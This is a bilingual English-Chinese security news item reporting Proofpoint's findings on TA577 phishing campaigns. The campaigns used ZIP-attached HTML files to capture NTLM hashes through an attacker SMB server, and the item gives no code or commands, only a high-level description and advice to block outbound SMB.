TA577利用ZIP附件窃取NTLM哈希

The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.

众所周知的威胁行为者TA577已被观察到在钓鱼邮件中使用ZIP压缩附件，目的是窃取NT LAN管理器（NTLM）哈希值。

The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.

企业安全公司Proofpoint在周一的一份报告中表示，这种新的攻击链"可以用于敏感信息收集和启用后续活动"。

At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.

该公司补充说，至少有两次利用这种方法的活动在2024年2月26日和27日观察到。这些钓鱼攻击波传播了数千封邮件，针对了全球数百家组织。

The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.

这些邮件本身看起来像是对先前邮件的回复，这是一种被称为线程劫持的已知技术，旨在增加攻击成功的可能性。

The ZIP attachments – which are the most common delivery mechanism – come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.

这些ZIP附件是最常见的传送机制，附带一个设计用于联系受控服务器消息块（SMB）服务器的HTML文件。

"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said, which could then be used for pass-the-hash (PtH) type attacks.

"根据攻击链和工具的特点，TA577的目标是从SMB服务器捕获NTLMv2挑战/响应对，以窃取基于NTLM哈希值的NTLM哈希值，然后可以用于通过哈希（PtH）类型的攻击。"

This means that adversaries who are in possession of a password hash do not need the underlying password to authenticate a session, ultimately enabling them to move through a network and gain unauthorized access to valuable data.

这意味着拥有密码哈希的对手不需要底层密码来验证会话，最终使他们能够在网络中移动并未经授权地访问有价值的数据。

TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.

TA577与趋势微观跟踪的活动集群重叠，是最复杂的网络犯罪组织之一。它曾与分布木马家族如QakBot和PikaBot有关。

"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.

Proofpoint表示，TA577采用和分发新的战术、技术和程序（TTP）的速度表明，该威胁行为者可能拥有时间、资源和经验，可以快速迭代和测试新的传递方法。

It also described the threat actor as acutely aware of the shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are highly recommended to block outbound SMB to prevent exploitation.

它还将这种威胁行为者描述为对网络威胁景观变化敏锐，迅速适应并完善其技术和传递方法，以规避检测并释放各种有效负载。强烈建议组织阻止出站SMB以防止利用。

---

参考资料

[1]https://thehackernews.com/2024/03/warning-thread-hijacking-attack-targets.html

---

原文始发于微信公众号（知机安全）：TA577利用ZIP附件窃取NTLM哈希